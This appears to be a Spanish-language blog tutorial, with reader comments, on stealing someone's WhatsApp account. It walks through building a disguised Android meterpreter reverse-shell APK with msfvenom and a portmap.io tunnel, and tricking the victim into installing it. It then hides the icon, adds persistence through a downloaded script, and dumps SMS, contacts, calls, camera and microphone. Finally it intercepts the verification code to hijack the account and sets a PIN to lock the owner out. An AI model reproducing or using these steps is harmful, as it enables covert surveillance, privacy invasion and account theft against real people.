HOLA AMIG@S, ESTE ES UN METODO DE COMO ROBAR UNA CUENTA DE WHATSAPP USANDO UN PAYLOAD, TEN EN CUENTA QUE ESTA INFORMACION ES RECOLECTADA DE DISTINTOS SITIOS WEB Y VIDEOS TUTORIALES DE YOUTUBE, NO SOY EL CREADOR DE DICHAS HERRAMIENTAS, NI MUCHO MENOS DUEÑO DE LOS CANALES DE YOUTUBE PERO ME DI EL TRABAJO DE JUNTAR TODA ESTA INFORMACION Y TENER UN METODO CLARO Y SENCILLO DE ROBAR UNA CUENTA DE WHATSAPP, SI ESTAS INTERESADO EN APRENDER, LEE ESTE TEXTO HASTA EL FINAL.
ANTES DE EMPEZAR QUIERO ACLARAR QUE PARA ESTE METODO DEBES CONTAR COMO MINIMO CON 1.00GB DE ALMACENAMIENTO INTERNO EN TU DISPOSITIVO ANDROID, SI NO DISPONES DE ESE ESPACIO EN TU ALMACENAMIENTO INTERNO... LASTIMOSAMENTE ESTE METODO NO ES PARA TI. MUY BIEN, ACLARADO TODO ESTO... ¡EMPEZEMOS!
Ir a Play Store e Instalar la aplicación llamada "Termux".
Una vez instalada, abrir Termux y esperar un momento hasta que se instalen los paquetes necesarios para usarse.
Dentro de termux, escribir los siguientes comandos... Cabe aclarar que despues de escribir cada comando en Termux tienes que pulsar la tecla Enter y si en la instalacion de cualquier paquete te hacen una pregunta asi [Y/N] deberas responder de forma afirmativa con la letra ( y ) sin los parentesis y despues pulsar Enter, estos son los comandos:
apt update && apt upgrade -y
termux-setup-storage
pkg install unstable-repo
pkg install metasploit
El primer comando que escribiste busca actualizaciones en termux y si las encuentra las instala.
El segundo comando que escribiste otorga permisos de almacenamiento a Termux para que puedas acceder a las herramientas y carpetas que instalaras a continuacion.
El tercer comando que escribiste instala un complemento necesario para la instalacion de Metasploit.
El cuarto comando que escribiste instala Metasploit-Framework dentro de Termux.
AHORA SAL DE TERMUX DESDE LA BARRA DE NOTIFICACIONES EN EL BOTON QUE DICE [exit] Y SIGUE ESTOS PASOS:
Ir al Navegador de Google Chrome (OJO, DEBE SER ESTE NAVEGADOR)
Pulsar en los 3 puntos que estan en la parte superior derecha del navegador de Google Chrome y seleccionar la opcion que dice: [Sitio de Escritorio]
Ingresar a la pagina: portmap.io
Pulsar en el boton [SIGN-IN] para crear una cuenta de portmap
En el recuadro que dice [Login] escribir un Apodo, (El que tu quieras).
En el recuadro que dice [E-Mail-Address] escribir un correo electronico tuyo al que puedas ingresar.
En el recuadro que dice [Password] escribir una contraseña, (La que tu quieras).
En el recuadro que dice [Confirm Password] escribir la misma contraseña que escribiste anteriormente.
Desmarcar el visto de la casilla que dice:
[] I agree to receive newsletters from portmap.io
Marcar la casilla que dice:[] I agree to the terms of services
Para completar el registro pulsar en [+Register]
Ahora tendras que verificar tu correo electrnoico que utilizaste para registrarte en portmap, para realizarlo deberas entrar en tu correo electronico y pulsar en el enlace de verificacion que te llegara a tu bandeja de mensajes.
Regresar a la pagina portmap.io y ya estaras dentro de tu cuenta portmap.
Pulsar en el boton que dice [Configuration]
Pulsar en [Create New Configuration]
En el espacio que dice [Name] escribir cualquier nombre.
En el espacio que dice [Typ] seleccionar la opcion [OpenVPN].
En el espacio que dice [Pro] seleccionar el protocolo [tcp].
Pulsar en el boton [Generate].
Después de generar el archivo pulsar en [Download] para descargar el archivo que despues sera usado en una App. (OJO) Solo se puede descargar desde Google Chrome.
Pulsar en el boton [Create]
Muy bien, Acabas de crear tu propia configuracion que sera necesaria para crear tus PayLoads.
Pulsar en el boton que dice [MAPPING RULES].
Pulsar en [Create New Rules].
Seleccionar la opcion [Portmap.io]
En el espacio que dice [Port on your PC] escribir cualquier puerto local, en mi caso es [8080].
Pulsar en [Create].
Por lo general aqui en este paso se genera un error, en el caso de que no se haya creado tu servidor y te haya dado error, tendras que volver a cargar la pagina, seleccionar de nuevo la opcion [Portmap.io] escribir tu puerto local [8080] y pulsar en [Create].
Por lo general aqui en este paso se genera un error, en el caso de que no se haya creado tu servidor y te haya dado error, tendras que volver a cargar la pagina, seleccionar de nuevo la opcion [Portmap.io] escribir tu puerto local [8080] y pulsar en [Create].
Muy bien, hasta aqui ya tienes creado un servidor el cual servira para acceder al dispositivo de la victima en cualquier lugar que se encuentre, toma nota de los datos creados. EJEMPLO:
termuxhacking-56371.portmap.io
56371
A CONTINUACION:
Salir del navegador y entrar a Play Store e instalar la aplicacion llamada "OpenVPN Connect - Fast & Safe SSL VPN Client".
Abrir la aplicacion [OpenVPN]
Pulsar en el boton [AGREE] que aparecera cuando abras la aplicacion.
Pulsar en el boton que dice [FILE] y buscar el archivo descargado de Google Chrome, por lo general este archivo se encuentra en la carpeta Download de la memoria interna de tu dispositivo android.
Seleccionar el archivo y pulsar en el boton [Import].
Aqui aparece la direccion IP de tu conexion del servidor con otras palabras.
Borrar las demas palabras y solo dejar la direccion IP.
Pulsar en el boton [ADD].
Pulsar en el calculo de la parte superior izquierda de la pantalla para encender nuestra conexion VPN.
Te pedira permisos para encender la conexion, para darle los permisos deberas pulsar en el boton [Permitir] y esperar unos segundos hasta que nuestra conexion este encendida.
AHORA QUE YA TIENES LA CONEXION ENCENDIDA REALIZA LOS SIGUIENTES PASOS:
Salir de [OpenVPN] Pero no cerrar la Aplicacion.
Entrar a Termux, actualizar sus paquetes y crear un PayLoad con los siguientes comandos.
apt update && apt upgrade -y
msfvenom -p android/meterpreter/reverse_tcp LHOST=termuxhacking-56371.portmap.io LPORT=56371 R > /sdcard/Whatsapp.apk
AQUI YA ESTARIA CREADO EL PAYLOAD, TEN EN CUENTA QUE EL COMANDO PARA CREAR EL PAYLOAD ESTA CREADO CON LOS DATOS DE MI CONEXION, TU DEBERAS PONER LOS DATOS DE TU CONEXION, TUS DATOS LO PUEDES ENCONTRAR EN EL PASO QUE TE DIJE QUE TOMES NOTA DE TUS DATOS CREADOS, REEMPLAZA MIS DATOS CON TUS DATOS EN LA PARTE QUE DICE: [ LHOST= ] Y EN LA PARTE QUE DICE [ LPORT= ] POR LO DEMAS COPIA TODO NORMALMENTE.
Muy bien, ahora que ya esta creado tu PayLoad, deberas enviarlo a la victima y de alguna manera con alguna excusa engañala para que lo instale y lo abra por lo menos una vez, el PayLoad se encuentra en la memoria interna de tu dispositivo android con un nombre de "Whatsapp.apk".
Una vez que la victima ya haya instalado la aplicacion y la haya abierto por lo menos una vez, tu tendras acceso a toda la informacion de su dispositivo, esto incluye (camara frontal, camara trasera, Microfono, Mensajes de Texto, Contactos, Registro de llamadas, Aplicaciones, Fotos, Videos, Pdf, Carpetas, Musica, Documentos entre otros archivos). Para acceder a esta informacion sigue estos pasos:
Abrir Termux y ejecutar la consola de Metasploit-Framework para hacerlo escribe los siguientes comandos:
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost termuxhacking-56371.portmap.io
set lport 8080
exploit
TEN EN CUENTA QUE LA CONSOLA DE METASPLOIT-FRAMEWORK TAMBIEN ESTA SIENDO EJECUTADA CON MIS DATOS, TU DEBERAS REEMPLAZAR MIS DATOS CON TUS DATOS EN LA PARTE QUE DICE: set lhost POR LO DEMAS COPIA TODO NORMALMENTE.
A continuaciOn despues de ejecutar esos comandos, deberas esperar un momento hasta que la consola pueda acceder al dispositivo de la victima, esto dura unos segundos hasta que sale esta palabra: [meterpreter >]
Una vez que ya estes dentro del dispositivo de la victima realizaremos uno de los ultimos pasos que sirve para que la aplicacion desaparezca del dispositivo de la victima y para que puedas acceder al dispositivo de la victima en cualquier momento, despues te explicare como acceder a la informaciin de la victima, primero debes tener todo listo para que la victima no sospeche del Hack.
Bien, en la sesion de meterpreter escribir los siguientes comandos:
hide_app_icon
Con este comando, el icono de la aplicacion en la pantalla del dispositivo de la victima desaparecera y ya no lo podra desinstalar a menos que lo desisntale desde Ajustes, ahora sigue con los pasos:
Salir de Termux un momento, NO cierres su ventana de recientes.
Descargar el siguiente archivo que servira para poder acceder al dispositivo de la victima en cualquier momento. Descargalo desde el siguiente enlace: http://www.mediafire.com/file/i3tni492djkjq4c/per.sh/file
Una vez descargado el archivo, deberas salir del navegador y volver a termux desde las ventanas recientes y escribir los siguientes comandos en la sesion de meterpreter.
upload /sdcard/download/per.sh
shell
sh per.sh
Ctrl + c
y
exit
exit
Perfecto, si has seguido correctamente los pasos uno por uno hasta llegar aqui te Felicito, Ya tienes el control total del dispositivo de la victima, ahora para que hagas la prueba te recomiendo que cierres todas tus aplicaciones y apagues la conexion de la aplicacion [OpenVPN] pulsando en el circulo que se encuentra en la parte superior izquierda dentro de la aplicacion, una vez apagada la conexion, si deseas puedes cerrar la aplicacion y apagar tu [Wi-Fi] solo para que compruebes que podras acceder al dispositivo de la victima cuando tu quieras y para que veas que no hay problema de que se pierda el control cuando apagas tu conexion a internet.
Una vez que hayas hecho todo lo que te dije te explicare el procedimiento que deberas realizar para acceder al dispositivo de la victima en cualquier momento, pon atencion
aqui porque estos seran los pasos que siempre usaras cuando quieras acceder al dispositivo de la victima, muy bien dicho todo esto ahora sigue estos pasos:
Encender tu red [Wi-Fi].
Abrir la aplicacion [OpenVPN].
Encender tu conexion VPN pulsando en el circulo que se encuentra en la parte superior izquierda de la pantalla.
Salir de [OpenVPN] pero no cerrar su pestaña de recientes.
Abrir Termux, actualizar sus paquetes, ejecutar la consola de metasploit-framework y acceder a su dispositivo, para hacerlo escribe los siguientes comandos:
apt update && apt upgrade -y
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost termuxhacking-56371.portmap.io
set lport 8080
exploit
TEN EN CUENTA QUE LA CONSOLA DE METASPLOIT-FRAMEWORK TAMBIEN ESTA SIENDO EJECUTADA CON MIS DATOS, TU DEBERAS REEMPLAZAR MIS DATOS CON TUS DATOS EN LA PARTE QUE DICE: set lhost POR LO DEMAS COPIA TODO NORMALMENTE.
Muy bien, una vez que hayas escrito todos estos comandos solo deberas esperar unos segundos hasta que accedas al dispositivo y estes en la sesion de [meterpreter >].
SI TUVISTE PROBLEMAS HASTA AQUÍ, TE DEJARE UN VIDEO QUE MUESTRA EL PROCESO DE ESTE TEXTO HASTA AQUI:
Ahora te enseñare a acceder a la informacion del dispositivo de la victima, puedes usar el siguiente comando como ayuda para que mires todas las opciones que te ofrece [meterpreter=>], escribe el siguiente comando:
help
Aqui puedes ver todas las funciones que tienes, te enseñare los comandos mas importantes uno por uno para que entiendas como usar [meterpreter >], muy bien, pon mucha atencion para que accedas a la informacion correctamente.
Los comandos que te voy a explicar son:
sysinfo
Este comando te permite ver la version android del dispositivo de la victima.
dump_calllog
-o /sdcard/download/llamadas.txt
Este comando crea un archivo en formato .txt sobre todo el registro de llamadas del dispositivo de la victima y lo guarda en la carpeta Download de tu memoria interna.
dump_contacts
-o /sdcard/download/contactos.txt
Este comando crea un archivo en formato .txt sobre todos los contactos del dispositivo de la victima y lo guarda en la carpeta Download de tu memoria interna.
dump_sms -o /sdcard/download/sms.txt
Este comando crea un archivo en formato .txt sobre todos los mensajes de texto del dispositivo de la victima y lo guarda en la carpeta Download de tu memoria interna.
hide_app_icon
Este comando oculta el icono de tu payload para que no se muestre en la pantalla principal del dispositivo de la victima.
webcam_snap -i 1 -p /sdcard/download/foto.jpeg
Este comando toma una foto a travez de la camara trasera del android de la victima y la guarda en la carpeta Download de tu memoria interna.
webcam_snap -i 2 -p /sdcard/download/foto.jpeg
Este comando toma una foto a travez de la camara frontal del android de la victima y la guarda en la carpeta Download de tu memoria interna.
record_mic -d 15 -f /sdcard/download/grabacion.wav
Este comando graba un audio de 15 segundos desde el android de la victima y lo guarda en la carpeta Download de tu memoria interna.
set_audio_mode -m 0
Este comando cambia el estado de vibracion o sonido a silencio en el dispositivo de la victima.
Muy bien, estos no son todos los comandos pero si son los mas importantes, si quieres ver los demas comandos te dejare un enlace donde te redireccionara a Mega y de ahi deberas descargar un PDF que contiene todos los comandos de meterpreter mas detallados, Este es el enlace: https://mega.nz/#!nq5AhY5I!WsiGUSW5q-KcTwJDJTS641L137XPu6IAGbUj2S3HRyY
Ahora que ya sabes para que sirve cada comando, te enseñare a robar la cuenta de whatsapp de la victima, para ello en la sesion de meterpreter deberas escribir los siguientes comandos:
cd /sdcard/WhatsApp/Databases
Despues de poner este comando estaras dentro de la carpeta Databases del dispositivo de la victima, ahora deberas descargar todos los Databases si quieres tener acceso a sus conversaciones de whatsapp, para descargar sus databases deberas poner el siguiente comando y los databases de la victima:
download nombre de los databases /sdcard
Muy bien, despues de que los Databases hayan sido descargados, sal un momento de termux sin cerrar su ventana de recientes y despues dirigete a la Play Store y descarga la aplicacion [Parashell Space Multi Cuentas], esta aplicacion te servira para abrir el whatsapp hackeado dentro de ella, ademas de eso deberas descargar un explorador de archivos, si no tienes un explorador de archivos aqui te dejare uno para que lo descargues: https://mega.nz/#!v7o3RADB!wqRPgg3ssysDhnd6drMpB2Ii8DFjbFtudTsKGuicWEU
Una vez que ya tengas [Es explorador de archivos pro] y [Parashell Space Multi Cuentas] instalados, sigue estos pasos:
Abrir [Parashell Space Multi Cuentas] darle todos los permisos que te pida a la aplicacion y clonar la aplicaciin de Whatsapp.
Una vez que hayas clonado la aplicacion de Whatsapp entra a ella y sigue estos pasos:
Pulsar en [Aceptar y Continuar] cuando ya estes dentro del whatsapp clonado.
Salir un momento de [Parashell Space Multi Cuentas] pero no borres su pestaña de recientes.
Abrir [Es Explorador de Archivos Pro] (El que acabas de descargar).
Copiar todos los Databases descargados en la siguiente carpeta, para entrar a dicha carpeta sigue estos pasos:
Buscar y entrar a la carpeta llamada [parallel_intl].
Dentro de la carpeta [parallel_intl] entrar a la carpeta llamada [ 0 ].
Dentro de la carpeta llamada [ 0 ] entrar a la carpeta llamada [WhatsApp].
Por ultimo, dentro de la carpeta llamada [WhatsApp] crear la carpeta con el siguiente nombre [Databases] y pegar los Databases en esa carpeta.
Ahora sal un momento del explorador de archivos, vuelve a entrar en termux y en la sesion de meterpreter escribe el siguiente comando:
set_audio_mode -m 0
Este comando servira para que la victima no se percate del sonido de la notificacion del mensaje de texto que se lo enviaremos a continuacion.
Ahora deberas salir de termux un momento sin cerrar sus pestañas de recientes y seguir estos pasos:
Abrir la aplicacion [Parashell Space Multi Cuentas] y escribir el numero de telefono de la victima en el whatsapp clonado y pulsar en el boton que dice [SIG.] y despues pulsar en la opcion que dice [OK].
Te dira que escribas el codigo de verificacion que se enviara a el numero que escribiste anteriormente y para poder ver ese codigo sigue estos pasos:
Salir de [Parashell Space Multi Cuentas] por un momento sin cerrar su pestaña de recientes.
Abrir Termux nuevamente y escribir los siguientes comandos dentro de la sesión de meterpreter:
dump_sms -o /sdcard/download/sms.txt
Una vez escrito este comando, se creara un archivo llamado sms.txt y este se encuentra en la carpeta Download de tu almacenamiento interno, para entrar en el sigue estos pasos:
Cierra [Termux] completamente desde la barra de notificaciones en el boton que dice [exit].
Entrar a [Es Explorador de Archios Pro].
Buscar y entrar en la carpeta [Download].
Buscar y abrir el archivo [sms.txt].
Dentro del archivo busca el mensaje donde se encuentra el codigo de verificacion y copialo.
Salir de [Es Explorador de Archivos Pro].
Entrar a [Parashell Space Multi Cuentas] desde las ventanas recientes.
Pegar el codigo de Verificacion que copiaste en la aplicacion clonada de whatsapp.
Pulsar en [Restaurar] para obtener los chats de whatsapp de la victima.
Pulsar en [SIG.].
Escribir un nombre (El que tu quieras) y pulsar en [SIG.]
Muy bien, aqui ya estamos dentro de la cuenta de whatsapp de la victima, ahora vamos a realizar el ultimo paso para apoderarnos de la cuenta de la victima y que esta ya no pueda recuperarla, para hacerlo sigue estos pasos:
Pulsar en los [3 puntos] que se encuentran en la parte superior derecha de la pantalla de whatsapp
Pulsar en [Ajustes]
Pulsar en [Cuenta]
Pulsar en [Verificación en dos pasos]
Pulsar en [Activar]
Escribir un PIN de 6 dígitos que servirá para que la victima no recupere su cuenta de whatsapp, (El que tu quieras).
Pulsar en [SIG.]
Vuelve a Escribir tu PIN de 6 dígitos que escribiste anteriormente para confirmarlo.
Pulsar en [SIG.]
Pulsar en [Omitir]
Y LISTO, EL WHATSAPP ES COMPLETAMENTE TUYO.
Si necesitas ayuda puedes contactarme en la página de facebook 😊😉
Autor/a: JH1
Hola me gustaría poder aprender a hacer todo lo que dices en esta página, pero no entiendo bien, existen vídeo de como hacerlo o tutoriales o algo así o tú también enseñas por aparté.
ResponderBorrarNo amigo no enseño por aparte por razónes de tiempo y trabajo, por eso notaran que casi no subo mucho contenido a este blog :)
BorrarQuisiera unirme al grupo de WhatsApp, pero el enlace ya fue restablecido
ResponderBorrarOla necesito tu ayuda
ResponderBorrarSi dime en que te puedo ayudar
BorrarComo te puedo contactar? La liga para el gruponde whatsapp no sirve
ResponderBorrarSIMPLEMENTE GRACIAS , EXCELENTE APORTE, desde ya tienen un nuevo seguifor. MAESTROS
ResponderBorrarMe alegro que te guste, si quieres ayudar puedes hacerlo compartiendo el blog para llegar a mas personas tú
BorrarBro una consulta no hay un video explicando mejor todo esto es un poco difícil o no haces trabajos de hack?
ResponderBorrarHice el proceso tal cual y pude conectarme
ResponderBorrarPero solo hasta dónde me permite borrar la imagen de la app, luego salió y no me permite entrar.
Muy pero muy buen material muchas gracias , solo estoy atorado en el transcribir lo del comando msfvenom si me sale la carpeta de WhatsApp apk pero esta vacía la mando a un teléfono y dice error no abre nada :/ ya ahi me atore
ResponderBorraren la parte de "OpenVPN Connect - Fast & Safe SSL VPN Client" en la parte de cargar el archivo .txt no aparece en la app... cambie de ubicaion el archivo y tampoco aparece... sera q se descargo mal el archivo??? ayuda por favor
ResponderBorrarRenombra el archivo y borrar txt y te sale después.
Borrar